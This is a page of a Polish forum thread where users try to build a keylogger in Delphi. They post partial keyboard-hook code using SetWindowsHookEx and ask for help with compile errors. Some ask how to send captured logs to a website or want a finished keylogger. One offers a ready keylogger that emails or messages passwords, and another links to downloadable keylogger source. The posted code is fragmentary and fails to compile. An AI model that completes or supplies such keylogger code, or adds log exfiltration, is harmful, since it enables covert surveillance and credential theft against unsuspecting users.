Strona 2 z 4 PierwszyPierwszy 1234 OstatniOstatni
Pokaż wyniki od 16 do 30 z 57
  1. #16
    Użytkownik
    Dołączył
    15-02-2009
    Posty
    1

    Domyślnie

    mi jeszcze wywala bład przy
    Kod:
    Hook:=SetWindowsHookEx(wh_journalrecord,play,HInstance,0);
    co msuze zmienic??

  2. #17
    Użytkownik
    Dołączył
    25-02-2009
    Skąd
    Chrzanów
    Posty
    28

    Domyślnie

    <div class='quotetop'>CYTAT(byczekg221 @ 15.02.2009, 17:00) <{POST_SNAPBACK}></div>
    mi jeszcze wywala bład przy
    Kod:
    Hook:=SetWindowsHookEx(wh_journalrecord,play,HInstance,0);
    co msuze zmienic??[/b]
    Mi tak samo wywala
    Pomocy.

  3. #18
    Użytkownik
    Dołączył
    11-09-2008
    Posty
    4

    Domyślnie

    A ja mam pytanie co zrobic aby Keylogger wysyłał logi na strone ?

  4. #19
    Użytkownik
    Dołączył
    11-09-2008
    Posty
    4

    Domyślnie

    Ponawiam pytanie.

  5. #20
    Użytkownik
    Dołączył
    24-03-2009
    Posty
    1

    Domyślnie

    A może ktoś przesłać mi Cały Kod? albo już całego keyleggora zrobionego

  6. #21
    Użytkownik
    Dołączył
    17-03-2009
    Posty
    2

    Domyślnie

    A jak zrobic, aby zapisywał małe litery ?

  7. #22
    Użytkownik
    Dołączył
    05-04-2009
    Posty
    1

    Domyślnie

    Witam czy ktoś może pomóc
    Nie wiem co robić

    Mój KOD:

    <div class='codetop'>CODE</div><div class='codemain' style='height:200px;white-spacere;overflow:auto'>unit Unit1;

    interface

    uses
    Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
    Dialogs;

    type
    TForm1 = class(TForm)
    procedure FormDestroy(Sender: TObject);
    procedure FormCreate(Sender: TObject);
    private
    [b]Var

    Hook : Integer;

    MessageBuffer :TEventMsg;
    public
    { Public declarations }
    end;

    var
    Form1: TForm1;

    implementation

    {$R *.dfm}

    procedure TForm1.FormDestroy(Sender: TObject);
    function Play(Code: integer; wParam, lParam: Longint): Longint; stdcall;
    begin
    case Code of
    HC_ACTION: begin
    MessageBuffer:=PEventMsg(lParam)^;
    if MessageBuffer.message = wm_KeyDown then
    begin

    Form1.Memo1.Text:=Opcje.Memo1.Text+chr(MessageBuff er.paraml);
    Result:=0;
    end;
    end;
    else
    begin
    Result := CallNextHookEx(Hook, Code, wParam, lParam);
    end;
    end;
    end;

    begin
    UnHookWindowsHookEx(Hook);
    end;

    procedure TForm1.FormCreate(Sender: TObject);
    begin
    Hook:=SetWindowsHookEx(wh_journalrecord,play,HInst ance,0);
    end;

    end.</div>


    POLE CZERWONE TO BŁĘDY

  8. #23
    Użytkownik
    Dołączył
    28-04-2009
    Posty
    1

    Domyślnie

    ja moge tylko podaj mi e maila wysle ci go wylaczonego na poczte i tam ustawiasz go ze moze wysylać ci hasla na e mail lub gg

  9. #24
    Użytkownik (R) Avatar djmentos
    Dołączył
    01-05-2007
    Skąd
    Gdansk, Poland, Poland
    Posty
    1 147

    Domyślnie

    Kolega z problemem:
    Nic nie można zobić. To błąd "śmiertelny", który uśmięrca wirusy. To się zdarza
    Pozostaje napisać nowy

  10. #25
    Użytkownik
    Dołączył
    04-06-2009
    Posty
    19

    Domyślnie

    Źródło prostego programu do zapisywania wciskanych klawiszy w delphi.
    Zakłada globalnego hooka na klawiaturę.
    Logi są w html, czytelne i "pokolorowane".
    Zapisuje nazwe okna w którym wpisywano dany tekst.

    Screen:


    Link:
    http://securityforum.unl.pl/delphi_k...ok_example.zip
    lub gdyby tamten nie działał to:
    http://rapidshare.com/files/240870334/delp...xample.zip.html
    no i jeszcze jeden link, gdyby tamte juz nie dzialaly:
    http://www.speedyshare.com/198879991.html

    To nie jest kompletny keylogger tylko przykład do nauki, zatem nie ma funkcji ukrywania, ani wysyłania nigdzie logów.

  11. #26

    Domyślnie

    @HakerPL nie wiem czy mam racje ale jezeli wywala Ci błąd w sekcji VAR, to mi się wydaje - a wrecz jestem na 99% pewny ze w PRIVATE nie mozna deklarować zmiennych. powinieneś je dać tam gdzie nalezy czyli pod Form1: TForm1; albo gdzies w programie, kod powinien wyglądać wtedy przykładowo tak: (kawalek)

    Kod:
    type
    **TForm1 = class(TForm)
    ****procedure FormDestroy(Sender: TObject);
    ****procedure FormCreate(Sender: TObject);
    **private
     
    **public
    
    **end;
    
    var
    **Form1: TForm1; // tutaj sobie wrzuc deklaracje
    **Hook : Integer;
    **MessageBuffer :TEventMsg;
    
    implementation
    
    {$R *.dfm}
    
    procedure TForm1.FormDestroy(Sender: TObject);
    //i tam dalej
    [B]repeat[/B]
    Messagebox(handle, [COLOR="Blue"]'Szacunek Ludzi Ulicy'[/COLOR], [COLOR="Blue"]'UltrasGS'[/COLOR], MB_OK);
    [B]Until [/B] [COLOR="Red"]Brak Warunku zakończenia[/COLOR]
    __________________

  12. #27
    Użytkownik
    Dołączył
    14-07-2008
    Skąd
    Opole
    Posty
    37

    Domyślnie

    <div class='quotetop'>CYTAT(malwarecoder @ 4.06.2009, 22:51) <{POST_SNAPBACK}></div>
    Źródło prostego programu do zapisywania wciskanych klawiszy w delphi.
    Zakłada globalnego hooka na klawiaturę.
    Logi są w html, czytelne i "pokolorowane".
    Zapisuje nazwe okna w którym wpisywano dany tekst.

    Screen:


    Link:
    http://securityforum.unl.pl/delphi_k...ok_example.zip
    lub gdyby tamten nie działał to:
    http://rapidshare.com/files/240870334/delp...xample.zip.html
    no i jeszcze jeden link, gdyby tamte juz nie dzialaly:
    http://www.speedyshare.com/198879991.html

    To nie jest kompletny keylogger tylko przykład do nauki, zatem nie ma funkcji ukrywania, ani wysyłania nigdzie logów.[/b]
    ...

  13. #28
    Dawni Moderatorzy
    Dołączył
    26-12-2005
    Skąd
    z Polski
    Posty
    527

    Domyślnie

    Heh, to moje źródło z dawnego forum webhat.pl, kiedyś je tam umieściłem, tylko zmienione kolorowanie logów i wygląd okienka, ale spoko, źródło umieściłem, żeby ludzie z niego korzystali, ale Ty malwarecoder jak już kopiowałeś to mogłeś przynajmniej ten tytuł z paska usunąć :]

  14. #29
    Użytkownik
    Dołączył
    03-07-2009
    Posty
    1

    Unhappy

    <div align='center'>Witam.
    Mimo wszystko mam Problem.
    <div class='codetop'>CODE</div><div class='codemain' style='height:200px;white-spacere;overflow:auto'>unit Unit1;

    interface

    uses
    Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
    Dialogs, StdCtrls;

    type
    TForm1 = class(TForm)
    procedure FormDestroy(Sender: TObject);
    procedure FormCreate(Sender: TObject);
    private
    { Private declarations }
    public
    { Public declarations }
    end;

    var
    Form1: TForm1;
    Hook : Integer;

    MessageBuffer :TEventMsg;


    implementation

    {$R *.dfm}

    procedure TForm1.FormDestroy(Sender: TObject);
    begin
    UnHookWindowsHookEx(Hook); // wprowadzamy
    end;

    function Play(Code: integer; wParam, lParam: Longint): Longint; stdcall;
    begin
    case Code of
    HC_ACTION: begin
    MessageBuffer:=PEventMsg(lParam)^;
    if MessageBuffer.message = wm_KeyDown then
    begin

    Form1.Memo1.Text:=Form1.Memo1.Text+chr(MessageBuff er.paraml);
    Result:=0;
    end;
    end;
    else
    begin
    Result := CallNextHookEx(Hook, Code, wParam, lParam);
    end;
    end;
    end;


    procedure TForm1.FormCreate(Sender: TObject);
    begin

    Hook:=SetWindowsHookEx(wh_journalrecord,play,HInst ance,0);
    end;

    end.</div>


    A wyświetla mi:
    <div class='codetop'>CODE</div><div class='codemain' style='height:200px;white-spacere;overflow:auto'>Form1.Memo1.Text:=Form1.Memo1.Te xt+chr(MessageBuffer.paraml);</div>


    Nie wiem co robię źle, ale ku dołu okna "Unit1.pas" wyświetlają mi się błędy :

    <div class='codetop'>CODE</div><div class='codemain' style='height:200px;white-spacere;overflow:auto'>[Error] Unit1.pas(43): Undeclared identifier: &#39;Memo1&#39;,
    [Error] Unit1.pas(43): Missing operator or semicolon,
    [Error] Unit1.pas(43): Incompatible types,
    [Fatal Error] Project1.dpr(5): Could not compile used unit &#39;Unit1.pas&#39;.
    </div>

    Z góry dziękuje za pomoc.
    Pozdrawiam Lamer
    </div>

  15. #30

    Domyślnie

    Wiesz, nauczył byś się najpierw co to Delphi, trochę o Object Pascalu, a dopiero po tym zabrał za choćby copypastowanie czyjegoś kodu.

Podobne wątki

  1. Odpowiedzi: 3
    Ostatni post / autor: 25-01-2014, 21:57
  2. Odpowiedzi: 1
    Ostatni post / autor: 28-05-2013, 19:22
  3. exploity krok po kroku
    Przez sitek
    w forum Exploits/PenTests
    Odpowiedzi: 1
    Ostatni post / autor: 14-01-2006, 22:44

Uprawnienia

  • Nie możesz zakładać nowych tematów
  • Nie możesz pisać wiadomości
  • Nie możesz dodawać załączników
  • Nie możesz edytować swoich postów
  •